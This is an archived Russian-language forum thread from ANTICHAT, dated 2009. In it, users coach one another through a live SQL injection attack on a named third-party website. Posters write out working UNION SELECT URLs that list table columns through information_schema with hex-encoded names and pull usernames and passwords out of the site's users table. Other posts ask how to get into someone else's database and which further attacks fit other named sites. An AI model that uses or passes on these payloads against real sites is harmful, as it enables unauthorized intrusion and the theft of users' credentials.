ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.08.2009, 20:13
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...
нашел интересные имена таблиц, users и userlist, подставляю их в запрос:
http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273
выводит WoW в тайтле.
Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?
|
|
|

27.08.2009, 20:17
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
group_concat()
_http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+inf ormation_schema.columns+where+table_name=0x7573657 26c697374
0x757365726c697374 = userlist
Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:22..
|
|
|

27.08.2009, 20:19
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме: 4761503
Репутация:
229
|
|
Сообщение от jecka3000
ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...
нашел интересные имена таблиц, users и userlist, подставляю их в запрос:
http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273
выводит WoW в тайтле.
Если не ошибаюсь то надо не table_name а table_schema
Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)
Последний раз редактировалось wolmer; 27.08.2009 в 20:21..
|
|
|

27.08.2009, 20:38
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме: 420226
Репутация:
38
|
|
Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль  ))
|
|
|

27.08.2009, 20:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
в таблице users оказалисьнесколько интересных записей: name, pass
Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273
Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
|
|
|

27.08.2009, 20:50
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от Flair
Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль  ))
Заюзать скрипт или прогу  если есстественно разрешен конект из вне...
|
|
|

27.08.2009, 20:50
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от jecka3000
в таблице users оказалисьнесколько интересных записей: name, pass
Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273
Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
жжёшь, ты читал хоть что-то?
Сообщение от jecka3000
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273
_http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+ aawowinf_mrlink.users
Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:59..
|
|
|

27.08.2009, 20:53
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от jecka3000
в таблице users оказалисьнесколько интересных записей: name, pass
Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273
Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй...
Сообщение от wolmer
Если не ошибаюсь то надо не table_name а table_schema
Ошибаешься.
Последний раз редактировалось DrAssault; 27.08.2009 в 20:56..
|
|
|

28.08.2009, 00:11
|
|
Новичок
Регистрация: 27.08.2009
Сообщений: 1
Провел на форуме: 833
Репутация:
0
|
|
Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду?
_http://mysql.infobox.ru/server_databases.php
_http://mysql.infobox.ru/
|
|
|

28.08.2009, 01:22
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://www.allthat.nm.ru/107.htm
помимо хss и инклудов че ещё тут актуально?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|